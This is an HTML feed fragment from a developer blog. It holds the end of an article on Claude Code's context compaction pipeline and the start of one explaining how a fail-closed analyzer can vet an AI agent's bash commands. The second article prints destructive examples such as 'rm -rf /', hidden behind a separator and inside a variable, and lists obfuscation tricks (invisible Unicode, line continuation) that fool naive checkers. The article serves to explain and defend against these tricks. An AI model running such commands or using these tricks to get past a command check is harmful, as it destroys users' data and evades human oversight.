  &lt;span class="nx"&gt;create&lt;/span&gt; &lt;span class="nx"&gt;compaction&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt; &lt;span class="nx"&gt;using&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt; &lt;span class="nx"&gt;memory&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;summary&lt;/span&gt;
  &lt;span class="nx"&gt;estimate&lt;/span&gt; &lt;span class="nx"&gt;post&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;compact&lt;/span&gt; &lt;span class="nx"&gt;token&lt;/span&gt; &lt;span class="nx"&gt;count&lt;/span&gt;

  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;postCompactTokens&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="nx"&gt;autoCompactThreshold&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;  &lt;span class="c1"&gt;// Would immediately re-trigger&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The "messages to keep" calculation balances recency against token budget:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;start from first unsummarized message
if already at maxTokens (40K): stop
if already meeting minTokens (10K) AND minTextBlockMessages (5): stop
otherwise: expand backward until one of above conditions met
floor: most recent compact boundary (can't go before it)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The API invariant adjustment ensures the keep boundary doesn't split tool_use/tool_result pairs or thinking blocks that share the same message ID. It walks backward to include any orphaned pairs.&lt;/p&gt;
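&lt;p&gt;A sketch of that backward walk, assuming a simplified message shape where tool pairs share an &lt;code&gt;id&lt;/code&gt; and thinking blocks share a &lt;code&gt;group_id&lt;/code&gt; (both simplifying assumptions):&lt;/p&gt;

```python
# Hypothetical invariant adjustment: move the keep index backward until no
# tool_result in the kept slice is orphaned from its tool_use, and no
# block is split from siblings sharing its message group.
def adjust_keep_index(messages, keep_from):
    while keep_from > 0:
        kept = messages[keep_from:]
        tool_use_ids = {m["id"] for m in kept if m["type"] == "tool_use"}
        orphaned = any(m["type"] == "tool_result" and m["id"] not in tool_use_ids
                       for m in kept)
        split_group = (messages[keep_from].get("group_id") is not None
                       and messages[keep_from - 1].get("group_id")
                           == messages[keep_from].get("group_id"))
        if not (orphaned or split_group):
            break
        keep_from -= 1  # expand backward to include the missing half
    return keep_from
```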

&lt;p&gt;The token count estimate guards against a pathological loop: if the post-compact token count would already exceed the auto-compact threshold, the system rejects the result and returns null. Without this guard, session memory compaction would succeed, the next turn would trigger auto-compact again (because the kept messages are too large), triggering another session memory compact, and so on.&lt;/p&gt;

&lt;p&gt;Session memory compaction is significantly cheaper — no model call, no 20K output token generation. But it depends on the quality of the pre-extracted notes, which may miss nuances that a dedicated summarization call would capture.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Session Memory File Format
&lt;/h3&gt;

&lt;p&gt;The extraction prompt defines a structured markdown template with ten sections:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Session Title&lt;/strong&gt; — 5-10 word title&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Current State&lt;/strong&gt; — pending tasks, next steps&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Task Specification&lt;/strong&gt; — what the user asked, design decisions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Files and Functions&lt;/strong&gt; — important files and why they're relevant&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workflow&lt;/strong&gt; — bash commands, execution order, interpreting output&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Errors &amp;amp; Corrections&lt;/strong&gt; — encountered errors and their fixes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Codebase and System Documentation&lt;/strong&gt; — important components, how they fit together&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Learnings&lt;/strong&gt; — what worked, what to avoid&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Key Results&lt;/strong&gt; — exact user-requested output&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Worklog&lt;/strong&gt; — step-by-step summary of work done&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each section is capped at 2,000 tokens. The total file is capped at 12,000 tokens. When a section grows past its limit, the extraction prompt includes a reminder: "section must be condensed." When the total exceeds 12,000: "CRITICAL: file exceeds max, aggressively shorten."&lt;/p&gt;

&lt;p&gt;Before including session memory in a compaction result, the content is further truncated via &lt;code&gt;truncateSessionMemoryForCompact&lt;/code&gt;. This truncates each section to ~2,000 tokens (8,000 characters), preserving section headers and italic descriptions. An overflow marker tells the model it can read the full file if needed.&lt;/p&gt;
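&lt;p&gt;A minimal sketch of that per-section truncation, approximating 2,000 tokens as 8,000 characters as the text implies (the marker wording and section-splitting rule are assumptions):&lt;/p&gt;

```python
# Illustrative per-section truncation for session memory; not the real code.
SECTION_CHAR_CAP = 8_000  # ~2,000 tokens at ~4 chars/token
OVERFLOW_MARKER = "\n[truncated -- read the session memory file for full content]"

def truncate_session_memory(markdown):
    out = []
    # Split on "## " headers so each section is capped independently,
    # preserving the header text itself.
    for section in markdown.split("\n## "):
        if len(section) > SECTION_CHAR_CAP:
            section = section[:SECTION_CHAR_CAP] + OVERFLOW_MARKER
        out.append(section)
    return "\n## ".join(out)
```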

&lt;h3&gt;
  
  
  The Fallback Chain
&lt;/h3&gt;

&lt;p&gt;The full compaction fallback chain is:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Session memory compact&lt;/strong&gt; — cheapest, fastest, depends on extraction quality&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full compact with prompt cache sharing&lt;/strong&gt; — expensive but thorough, reuses cached prefix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full compact streaming&lt;/strong&gt; — fallback if cache sharing fails&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PTL retry with head truncation&lt;/strong&gt; — if compact itself exceeds context window&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User error message&lt;/strong&gt; — "Press esc twice to go up a few messages and try again"&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each tier is tried only when the previous one fails or is unavailable.&lt;/p&gt;
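&lt;p&gt;The chain can be sketched as a simple driver over ordered tiers, where returning &lt;code&gt;None&lt;/code&gt; means "unavailable" and an exception means "failed" (an illustrative convention, not the real control flow):&lt;/p&gt;

```python
# Hypothetical fallback-chain driver over the five tiers listed above.
class ConversationTooLong(Exception):
    pass

def compact_with_fallbacks(tiers):
    """tiers: ordered callables; each returns a result, returns None when
    unavailable, or raises on failure."""
    for tier in tiers:
        try:
            result = tier()
        except Exception:
            continue  # this tier failed; fall through to the next
        if result is not None:
            return result
    # Every tier exhausted: surface the user-facing error.
    raise ConversationTooLong(
        "Conversation too long. Press esc twice to go up a few messages and try again.")
```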

&lt;h2&gt;
  
  
  The Cost Model
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Stage&lt;/th&gt;
&lt;th&gt;Input Tokens&lt;/th&gt;
&lt;th&gt;Output Tokens&lt;/th&gt;
&lt;th&gt;Latency&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Microcompact (cached)&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;~0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microcompact (time-gap)&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;~0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Session memory compact&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;~0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Full compact&lt;/td&gt;
&lt;td&gt;~167K&lt;/td&gt;
&lt;td&gt;up to 20K&lt;/td&gt;
&lt;td&gt;1 model turn&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For full compact at the 200K threshold: 167K tokens of old history become ~20K tokens of summary plus rehydrated attachments. Net savings: ~147K tokens. The cost is one model turn's latency plus the input/output token charges for the summarization call.&lt;/p&gt;
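&lt;p&gt;The savings arithmetic, spelled out with the figures from the table and text:&lt;/p&gt;

```python
# Worked arithmetic for the full-compact savings estimate above.
pre_compact_history = 167_000   # input tokens of old history summarized away
summary_budget = 20_000         # maximum summary output
net_savings = pre_compact_history - summary_budget
assert net_savings == 147_000   # matches the ~147K figure in the text
```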

&lt;p&gt;Microcompact and session memory compact are essentially free — no model call, no token charges. They exist to defer the expensive full compact as long as possible.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Full Round-Trip
&lt;/h2&gt;

&lt;p&gt;To understand how the pieces fit together, trace one complete auto-compact cycle through the system:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. The REPL starts the query loop.&lt;/strong&gt; When the user sends a message, &lt;code&gt;REPL.tsx&lt;/code&gt; calls the &lt;code&gt;query()&lt;/code&gt; generator, which yields messages as they arrive. The REPL consumes them via &lt;code&gt;for await (event of query(...))&lt;/code&gt; and appends each to the UI.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Microcompact runs first.&lt;/strong&gt; Before anything else in the query loop, &lt;code&gt;microcompactMessages&lt;/code&gt; checks whether tool results should be cleared. If the cache is warm, it queues cache edits. If the user was idle for an hour, it mutates the message array directly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Auto-compact checks the threshold.&lt;/strong&gt; &lt;code&gt;autoCompactIfNeeded&lt;/code&gt; is called with the current messages, the tool use context, cache-safe parameters, and the tracking state. The tracking state is a persistent object threaded through the query loop — it carries the circuit breaker count, the turn counter, and the previous compact's turn ID across iterations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. The compaction runs.&lt;/strong&gt; If the threshold is exceeded, the system tries session memory first, then falls back to full compact. The full compact spawns a forked agent with the summarization prompt, streams the response, handles PTL retries if needed, and builds the post-compact message array.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Post-compact messages are yielded.&lt;/strong&gt; The query generator yields the boundary marker, summary messages, attachments, and hook results one at a time. Each &lt;code&gt;yield&lt;/code&gt; sends the message back to the REPL.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;6. The REPL detects the boundary.&lt;/strong&gt; When &lt;code&gt;onQueryEvent&lt;/code&gt; receives a compact boundary message, it handles it specially: in fullscreen mode, it keeps pre-compact messages for scrollback. In normal mode, it replaces the entire message array with just the boundary. It bumps the conversation ID (a random UUID), which forces React to remount all message rows — ensuring stale UI state doesn't persist.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;7. The query loop continues.&lt;/strong&gt; After yielding post-compact messages, the query loop replaces its internal &lt;code&gt;messagesForQuery&lt;/code&gt; with the compacted set and continues to the API call. The model sees only the summary, attachments, and the new user message. The tracking state is reset: turn counter to 0, turn ID to a fresh UUID, consecutive failures to 0.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;8. If the API call fails with prompt-too-long&lt;/strong&gt;, reactive compaction (when enabled) catches it. Reactive compact is the mirror of proactive auto-compact — instead of preventing the PTL error, it recovers from one. The error is "withheld" (not yielded to the REPL) while recovery is attempted. If recovery succeeds, the query loop continues with the compacted messages. If it fails, the withheld error is yielded and the session returns to the user.&lt;/p&gt;

&lt;p&gt;This round-trip — REPL → query generator → microcompact → auto-compact → forked agent → stream → boundary → yield → REPL — is the complete execution path. Every compaction, whether manual or auto, follows this flow.&lt;/p&gt;

&lt;h2&gt;
  
  
  Closing
&lt;/h2&gt;

&lt;p&gt;Every Claude Code conversation manages its context window through this pipeline:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Token monitoring&lt;/strong&gt; — canonical context size measurement, parallel tool call handling, threshold comparison with 13K buffer&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Circuit breaker&lt;/strong&gt; — max 3 consecutive failures before stopping auto-compact attempts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Microcompact&lt;/strong&gt; — clear stale tool results (time-based mutation or cached server-side edits) without a model call&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full compact&lt;/strong&gt; — 9-section summarization prompt, analysis scratchpad, NO_TOOLS dual-instruction, PTL retry with head truncation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Prompt cache sharing&lt;/strong&gt; — forked agent reuses the main conversation's cached prefix for the summarization call&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Post-compact rehydration&lt;/strong&gt; — 5 recent files (50K budget), active skills (25K budget), plan files, async agent status, tool deltas, MCP instructions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Post-compact cleanup&lt;/strong&gt; — 10+ caches cleared, main-thread/subagent scope isolation, deliberate non-clears for cost savings&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Session memory compact&lt;/strong&gt; — pre-extracted markdown notes as a cheap alternative to model-based summarization&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The system is designed to be invisible. The user keeps working. The conversation keeps going. Behind the scenes, context is compressed, caches are managed, and critical information is preserved. The only visible sign is a brief "Compacted..." message — and even that can be expanded to see the full original transcript.&lt;/p&gt;

&lt;p&gt;The fail-closed principle applies here too, but differently than in security. When compaction fails, the system doesn't silently drop messages. It retries with progressively more aggressive truncation, circuit-breaks after repeated failures, and ultimately asks the user to intervene. The alternative — silently losing context — would be worse than any interruption.&lt;/p&gt;

&lt;p&gt;The design reflects a hierarchy of priorities: correctness (never lose context silently) over cost (minimize API calls) over latency (minimize user-visible delay). Microcompact optimizes for cost and latency. Full compact prioritizes correctness. Session memory compact tries to get all three. The fallback chain ensures that even in adversarial conditions — massive conversations, API errors, extraction failures — the system degrades gracefully rather than catastrophically.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>claudecode</category>
      <category>architecture</category>
      <category>devtools</category>
    </item>
    <item>
      <title>How Bash Command Safety Analysis Works in AI Systems</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Mon, 06 Apr 2026 14:30:13 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/how-bash-command-safety-analysis-works-in-ai-systems-2nn2</link>
      <guid>https://dev.to/oldeucryptoboi/how-bash-command-safety-analysis-works-in-ai-systems-2nn2</guid>
      <description>&lt;h2&gt;
  
  
  Most people think validating shell commands is simple. Scan for &lt;code&gt;rm&lt;/code&gt;, block &lt;code&gt;eval&lt;/code&gt;, done. It's not even close.
&lt;/h2&gt;




&lt;p&gt;This is a clean-room technical reconstruction of how an AI-assisted system can evaluate the safety of bash commands before execution. Everything here is based on externally observable behavior, publicly available technical patterns, and general shell semantics. No proprietary source code or internal materials were accessed.&lt;/p&gt;

&lt;p&gt;All mechanisms described are conceptual reconstructions — how such a system &lt;em&gt;can&lt;/em&gt; be designed, not documentation of any specific implementation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The core problem
&lt;/h2&gt;

&lt;p&gt;At first glance, validating shell commands appears simple. Scan for dangerous patterns — &lt;code&gt;rm&lt;/code&gt;, &lt;code&gt;eval&lt;/code&gt;, &lt;code&gt;;&lt;/code&gt;, pipes, redirects — and block them.&lt;/p&gt;

&lt;p&gt;This approach fails immediately.&lt;/p&gt;

&lt;p&gt;Consider:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"safe"&lt;/span&gt; &lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-rf&lt;/span&gt; /
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Versus:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"safe ; rm -rf /"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A superficial parser cannot distinguish whether &lt;code&gt;;&lt;/code&gt; is a command separator or part of a quoted string.&lt;/p&gt;

&lt;p&gt;Shell syntax includes quoting rules, variable expansion, command substitution, arithmetic evaluation, brace expansion, and process substitution. Any of these can transform harmless-looking text into dangerous execution.&lt;/p&gt;

&lt;p&gt;A reliable system must understand the &lt;em&gt;structure&lt;/em&gt; of commands, not just their text.&lt;/p&gt;
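&lt;p&gt;The distinction can be demonstrated in a few lines. The sketch below uses Python's &lt;code&gt;shlex&lt;/code&gt; purely as an illustration of shell-style lexing. It is far weaker than a real bash parser (it doesn't treat an unspaced &lt;code&gt;;&lt;/code&gt; as a separator, for one), but it is enough to tell the two examples above apart:&lt;/p&gt;

```python
import shlex

def naive_flags_separator(cmd):
    """Naive textual scan: fires on ';' anywhere, even inside quotes."""
    return ";" in cmd

def structural_flags_separator(cmd):
    """Fires only when ';' survives shell-style lexing as its own
    token, i.e. when it really is a command separator."""
    return ";" in shlex.split(cmd)

dangerous = 'echo "safe" ; rm -rf /'   # ';' separates two commands
harmless  = 'echo "safe ; rm -rf /"'   # ';' is just quoted text
```

&lt;p&gt;The naive check flags both commands; the token-level check flags only the first. That asymmetry is the whole argument for structural analysis.&lt;/p&gt;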

&lt;h2&gt;
  
  
  Design principle: fail closed
&lt;/h2&gt;

&lt;p&gt;A robust analyzer follows a strict rule: if a command cannot be fully understood, it must not be automatically approved.&lt;/p&gt;

&lt;p&gt;This leads to an allowlist-based design. Only known-safe constructs are accepted. Everything else is treated as "too complex" and requires user confirmation.&lt;/p&gt;

&lt;p&gt;This avoids the fundamental weakness of blocklists — where every new attack vector is an automatic bypass. With an allowlist, every new construct triggers a prompt instead.&lt;/p&gt;

&lt;h2&gt;
  
  
  The multi-layer pipeline
&lt;/h2&gt;

&lt;p&gt;A well-designed system runs commands through a pipeline of defensive layers, each addressing a different class of failure:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pre-parse validation&lt;/li&gt;
&lt;li&gt;Structured parsing (AST)&lt;/li&gt;
&lt;li&gt;Allowlist-based traversal&lt;/li&gt;
&lt;li&gt;Variable scope tracking&lt;/li&gt;
&lt;li&gt;Controlled placeholder system&lt;/li&gt;
&lt;li&gt;Semantic validation&lt;/li&gt;
&lt;li&gt;Path and filesystem checks&lt;/li&gt;
&lt;li&gt;Policy enforcement&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Let's walk through each one.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layer 1: pre-parse validation
&lt;/h2&gt;

&lt;p&gt;Before parsing, the raw command string is inspected for patterns that create ambiguity between what a parser sees and what the shell executes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Control characters.&lt;/strong&gt; Hidden bytes can alter how text is interpreted. A null byte, a backspace sequence, or an ANSI escape code can make a command look different in a terminal than it does to a parser.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Invisible Unicode.&lt;/strong&gt; Characters like zero-width space can visually disguise commands. What looks like &lt;code&gt;ls&lt;/code&gt; might actually contain invisible characters that change execution.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Backslash line continuation.&lt;/strong&gt; This is subtle:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;tr&lt;/span&gt;&lt;span class="se"&gt;\&lt;/span&gt;
aceroute
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This appears to a line-oriented parser as two tokens, but the shell joins the lines and executes &lt;code&gt;traceroute&lt;/code&gt;. A parser that doesn't handle continuation will see something different from the shell.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Shell-specific extensions.&lt;/strong&gt; Features from zsh may not match bash parsing rules. If the analyzer assumes bash semantics, zsh-specific syntax creates ambiguity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Brace obfuscation.&lt;/strong&gt; Complex quoting inside &lt;code&gt;{}&lt;/code&gt; can mislead simple parsers.&lt;/p&gt;

&lt;p&gt;The goal of this layer: eliminate inputs where different interpreters would disagree on what the command means.&lt;/p&gt;
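&lt;p&gt;A minimal pre-parse gate might look like the following sketch. It is not any specific implementation; it just shows the fail-closed shape of the layer. Python's &lt;code&gt;str.isprintable&lt;/code&gt; conveniently rejects both control characters and zero-width Unicode in one check:&lt;/p&gt;

```python
def preparse_ok(cmd):
    """Reject raw strings whose rendering and parsing can diverge.
    Fail closed: any suspicious byte means 'do not auto-approve'."""
    # Control characters and invisible Unicode (zero-width space,
    # joiners, BOM, ANSI escape bytes) are all non-printable.
    for ch in cmd:
        if ch.isprintable() or ch in "\t\n ":
            continue
        return False
    # Backslash-newline continuation: the shell joins the lines,
    # so a line-oriented parser would see different tokens.
    if "\\\n" in cmd:
        return False
    return True
```

&lt;p&gt;Note that rejection here doesn't mean "block" — it means the command skips auto-approval and falls through to user confirmation.&lt;/p&gt;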

&lt;h2&gt;
  
  
  Layer 2: structured parsing
&lt;/h2&gt;

&lt;p&gt;Instead of regex, the system builds a syntax tree — an AST.&lt;/p&gt;

&lt;p&gt;This lets it separate commands, identify arguments, and track structure without execution. But parsing alone isn't sufficient, and one constraint is absolute: the parser must never execute the command it's analyzing.&lt;/p&gt;

&lt;p&gt;Resource limits matter here too. Maximum input size, maximum parse complexity, strict time limits. If any are exceeded, the command is marked as too complex. This prevents adversarial inputs designed to hang the parser.&lt;/p&gt;
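&lt;p&gt;The guard can be sketched like this, with &lt;code&gt;shlex&lt;/code&gt; again standing in for a real bash parser and the limits being assumed values for illustration. The important property is that every failure path maps to "too complex," never to "allow":&lt;/p&gt;

```python
import shlex

MAX_INPUT = 10_000    # assumed limits, for illustration only
MAX_TOKENS = 256

def tokenize_guarded(cmd):
    """Tokenize with hard limits; any failure means 'too complex'."""
    if len(cmd) > MAX_INPUT:
        return None                # too large: too complex
    try:
        tokens = shlex.split(cmd)
    except ValueError:             # e.g. an unbalanced quote
        return None                # unparseable: too complex
    if len(tokens) > MAX_TOKENS:
        return None                # too elaborate: too complex
    return tokens
```

&lt;p&gt;A production analyzer would also enforce a wall-clock timeout around the parse, for the same reason: an input crafted to make the parser hang must degrade to a prompt, not a stall.&lt;/p&gt;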

&lt;h2&gt;
  
  
  Layer 3: allowlist AST traversal
&lt;/h2&gt;

&lt;p&gt;After parsing, the system walks the syntax tree. The critical rule: only explicitly supported node types are allowed.&lt;/p&gt;

&lt;p&gt;Supported constructs include simple commands, pipelines, conditionals, and variable assignments. Anything the walker doesn't recognize — any unknown node type — is immediately classified as too complex.&lt;/p&gt;

&lt;p&gt;This is the most important design decision in the entire pipeline. It means the system doesn't need to enumerate every dangerous pattern. It only needs to enumerate safe ones.&lt;/p&gt;
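&lt;p&gt;The traversal itself is almost trivial once the rule is stated. Here is a sketch over hypothetical AST nodes represented as dicts (the node kinds and shape are illustrative, not any real parser's output):&lt;/p&gt;

```python
# Hypothetical AST nodes: {"kind": ..., "children": [...]}
ALLOWED_KINDS = {"command", "pipeline", "and_or", "assignment", "word"}

def walk_allowed(node):
    """Allowlist traversal: any node kind we did not explicitly
    anticipate makes the whole command 'too complex'."""
    if node["kind"] not in ALLOWED_KINDS:
        return False
    return all(walk_allowed(c) for c in node.get("children", []))
```

&lt;p&gt;A tree containing, say, a process-substitution node the walker has never seen returns &lt;code&gt;False&lt;/code&gt; without anyone having written a rule about process substitution. New shell features are safe by default because they're unrecognized by default.&lt;/p&gt;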

&lt;h2&gt;
  
  
  Layer 4: variable scope tracking
&lt;/h2&gt;

&lt;p&gt;Shell behavior depends heavily on execution order, and this is where naive analyzers break.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nv"&gt;FLAG&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nt"&gt;--safe&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cmd &lt;span class="nv"&gt;$FLAG&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A naive system might assume &lt;code&gt;$FLAG&lt;/code&gt; is always set. In reality, &lt;code&gt;FLAG&lt;/code&gt; may never be assigned depending on how &lt;code&gt;||&lt;/code&gt; and &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; chain.&lt;/p&gt;

&lt;p&gt;The analyzer models branching (&lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;, &lt;code&gt;||&lt;/code&gt;), subshells (&lt;code&gt;()&lt;/code&gt;), and pipelines. Variables are tracked with correct execution semantics — if a variable might not be defined in all branches, it's treated as unknown.&lt;/p&gt;
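&lt;p&gt;A toy version of that rule: model each segment with a flag saying whether it only runs conditionally (because it followed an &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; or &lt;code&gt;||&lt;/code&gt; connector), and treat any use of a name that was never unconditionally assigned as unknown. The triple-based representation is an assumption made for the sketch:&lt;/p&gt;

```python
def unknown_uses(segments):
    """Toy scope tracker. segments: (conditional, action, name)
    triples, where action is 'assign' or 'use'. An assignment on a
    conditional path is only 'maybe' set, so a later use of that
    name must be treated as statically unknown."""
    definite = set()
    unknown = []
    for conditional, action, name in segments:
        if action == "assign" and not conditional:
            definite.add(name)
        elif action == "use" and name not in definite:
            unknown.append(name)
    return unknown
```

&lt;p&gt;Modeling the example above, &lt;code&gt;FLAG&lt;/code&gt; is assigned only on a conditional path, so the later &lt;code&gt;$FLAG&lt;/code&gt; comes back as unknown and is handled by the placeholder layer rather than assumed to hold &lt;code&gt;--safe&lt;/code&gt;.&lt;/p&gt;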

&lt;h2&gt;
  
  
  Layer 5: the placeholder system
&lt;/h2&gt;

&lt;p&gt;Some constructs can't be resolved statically.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"commit &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;git rev-parse HEAD&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Instead of rejecting the entire command, the outer command is preserved and the inner command is extracted and analyzed separately.&lt;/p&gt;

&lt;p&gt;Placeholders like &lt;code&gt;__CMDSUB_OUTPUT__&lt;/code&gt; (for command substitutions) and &lt;code&gt;__TRACKED_VAR__&lt;/code&gt; (for unknown variables) let the analyzer reason about the structure of a command without needing to know the runtime values.&lt;/p&gt;

&lt;p&gt;But there's a critical constraint — bare variable risk:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;VAR&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"-rf /"&lt;/span&gt;
&lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nv"&gt;$VAR&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Shell expands this into &lt;code&gt;rm -rf /&lt;/code&gt;. To prevent this, variables containing whitespace or glob patterns are rejected unless quoted. The quoting distinction between &lt;code&gt;$VAR&lt;/code&gt; and &lt;code&gt;"$VAR"&lt;/code&gt; is load-bearing.&lt;/p&gt;
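&lt;p&gt;Both halves of the layer fit in a short sketch: substitute command substitutions with a placeholder (the regex is deliberately simplified and doesn't handle nesting), and reject unquoted expansions whose value could change the argument structure:&lt;/p&gt;

```python
import re

CMDSUB = re.compile(r"\$\([^)]*\)")   # simplified: no nested $( )

def with_placeholders(cmd):
    """Replace command substitutions with a placeholder so the outer
    command's structure can be analyzed; the inner command would be
    extracted and analyzed separately (not shown here)."""
    return CMDSUB.sub("__CMDSUB_OUTPUT__", cmd)

def expansion_is_safe(value, quoted):
    """Bare-variable rule: an unquoted value containing whitespace
    or glob characters can splinter into extra arguments, so it is
    rejected unless the expansion was quoted."""
    if quoted:
        return True
    return re.search(r"[\s*?\[\]]", value) is None
```

&lt;p&gt;With this rule, &lt;code&gt;rm "$VAR"&lt;/code&gt; passes (one argument, whatever it contains) while &lt;code&gt;rm $VAR&lt;/code&gt; with a whitespace-bearing value is rejected. Exactly the load-bearing distinction.&lt;/p&gt;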

&lt;h2&gt;
  
  
  Layer 6: semantic validation
&lt;/h2&gt;

&lt;p&gt;Even syntactically valid, structurally understood commands can be dangerous.&lt;/p&gt;

